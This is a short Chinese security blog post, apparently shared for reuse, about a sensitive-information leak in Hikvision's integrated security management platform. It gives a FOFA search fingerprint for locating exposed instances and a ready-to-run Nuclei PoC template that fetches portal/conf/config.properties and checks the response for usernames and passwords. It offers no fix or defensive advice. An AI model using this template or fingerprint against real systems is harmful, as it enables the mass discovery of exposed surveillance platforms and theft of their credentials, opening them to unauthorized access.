目录
【产品介绍】
海康威视(Hikvision)是一家总部位于中国杭州的公司,是全球最大的视频监控产品供应商。除了传统的CCTV摄像机和网络摄像机,海康威视还提供各种相关的安防产品和解决方案。他们的综合安防管理平台为用户提供了一站式的解决方案,包括视频监控、入侵检测、访客管理、停车场管理等。
【产品系统UI】
【漏洞说明】
海康威视综合安防平台portal/conf/config.properties接口存在敏感信息泄露
【指纹】
app=”HIKVISION-综合安防管理平台”
【Nuclei Poc】
id: hikvision-information
info:
name: hikvision-information
author: xxx
severity: info
description:
metadata:
fofa-query: app="HIKVISION-综合安防管理平台"
requests:
- method: GET
path:
- "{{BaseURL}}portal/conf/config.properties"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '@bic'
- 'username'
- 'password'
- type: status
status:
- 200
【验证】
点赞+在看支持一下吧~感谢看官老爷~